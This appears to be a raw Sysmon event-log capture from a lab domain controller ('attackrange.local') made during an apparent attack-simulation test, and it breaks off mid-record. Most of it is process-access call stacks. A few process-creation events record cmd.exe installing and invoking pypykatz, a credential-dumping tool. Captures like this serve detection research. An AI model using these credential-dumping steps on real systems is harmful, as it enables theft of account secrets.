21:10:05.217{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.224{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pip install pypykatz" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 23542300x800000000000000025231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txtMD5=1EA5228DE07F9958C170DAE50D9ED309,SHA256=8B92F2810F9B02ED176CB745DFE5956E5105FE8A0E76792782E8A11085D0C198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941FB1F4AB649507B10DEF5E739C473F,SHA256=9C2E99348B3826AFD08CAA45972C4BDB51430BBB4084F97A821E9645AF708F81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.202{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.197{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_6